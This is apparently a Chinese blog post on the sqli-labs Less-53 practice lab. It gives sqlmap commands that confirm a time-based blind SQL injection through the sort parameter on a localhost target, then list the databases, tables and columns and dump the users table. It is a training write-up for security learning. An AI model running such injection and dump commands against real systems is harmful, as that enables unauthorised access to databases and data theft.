sqli-labs-Less-53

heze092026-03-28 16:06

SQLI-LAPS 实验记录

Less-53

这一关与上一关类似,也是没有回显信息,采用sqlmap工具进行注入,发现只有时间盲注可以使用,因此,继续使用sqlmap工具来解决问题。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch

结果如图所示,只有一种注入方式:时间盲注。

接下来,我们继续使用sqlmap工具来进行注入,爆出数据库名、表名、列名等,语句如下:

  • 查询库名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch --dbs
  • 查询表名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security --tables
  • 查询列名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --columns
  • 查询数据:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --dump
相关推荐
咕噜签名-铁蛋2 小时前
GPU型实例安装nvidia-fabricmanager服务完整实操指南
大数据·数据库·人工智能·ai编程
LuckyTHP2 小时前
Centos7.9下 Mysql8.0 重置密码
mysql
sqyno1sky2 小时前
数据分析与科学计算
jvm·数据库·python
啥都想学点2 小时前
pikachu靶场——File Inclusion(Kali系统)
网络安全
楠目2 小时前
ThinkPHP 5.2 反序列化漏洞分析
网络安全
大方子2 小时前
【PolarCTF2026年春季挑战赛】Signed_Too_Weak
网络安全·polarctf
JS_SWKJ3 小时前
网闸:如何在“断连”中实现安全数据交换?
网络安全
gjc5923 小时前
如何写好SQL:企业内训文档
数据库·sql
liulilittle3 小时前
SQLite3增删改查(C
c语言·开发语言·数据库·c++·sqlite
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南09OpenClaw 使用和管理 MCP 完全指南10中国象棋-html版本